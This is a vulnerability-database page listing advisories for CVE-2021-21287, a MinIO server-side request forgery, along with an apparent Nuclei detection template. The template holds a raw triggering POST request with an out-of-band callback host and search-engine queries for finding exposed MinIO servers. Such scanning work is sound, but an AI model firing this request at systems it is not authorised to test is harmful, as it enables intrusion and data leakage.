| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2021-21287 | 1 Feb 202117:15 | – | alpinelinux | |
| [ASA-202102-10] minio: directory traversal | 6 Feb 202100:00 | – | archlinux | |
| CVE-2021-21287 | 1 Feb 202121:25 | – | circl | |
| Minio MinIO 代码问题漏洞 | 1 Feb 202100:00 | – | cnnvd | |
| MinIO Cross-Site Request Forgery Vulnerability | 3 Feb 202100:00 | – | cnvd | |
| CVE-2021-21287 | 1 Feb 202117:15 | – | cve | |
| CVE-2021-21287 Server-Side Request Forgery in MinIO Browser API | 1 Feb 202117:15 | – | cvelist | |
| CVE-2021-21287 | 1 Feb 202118:15 | – | nvd | |
| BIT-MINIO-2021-21287 Server-Side Request Forgery in MinIO Browser API | 6 Mar 202410:58 | – | osv | |
| CGA-CM65-7XJJ-2H4C | 12 Jan 202617:05 | – | osv |
id: CVE-2021-21287
info:
name: MinIO Browser API - Server-Side Request Forgery
author: pikpikcu
severity: high
description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage.
remediation: |
Apply the latest security patches or updates provided by MinIO to fix this vulnerability.
reference:
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
- https://github.com/minio/minio/pull/11337
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
- https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2021-21287
cwe-id: CWE-918
epss-score: 0.24784
epss-percentile: 0.97635
cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: minio
product: minio
shodan-query:
- http.title:"minio browser"
- cpe:"cpe:2.3:a:minio:minio"
- http.title:"minio console"
fofa-query:
- title="minio console"
- app="minio"
- title="minio browser"
google-query:
- intitle:"minio browser"
- intitle:"minio console"
tags: cve,cve2021,minio,ssrf,oast,vuln
http:
- raw:
- |
POST /minio/webrpc HTTP/1.1
Host: {{interactsh-url}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 76
{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http" # Confirms the HTTP Interaction
- type: word
words:
- "We encountered an internal error"
# digest: 4b0a00483046022100c0cb811e255b6f839e1f7faac25459e33bbfc87f7653cde15fc0359928807ada022100b83112f949688a9b1ab93fbfec27c332ee19078d5a4f70ff3c00aa8c247d28e0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation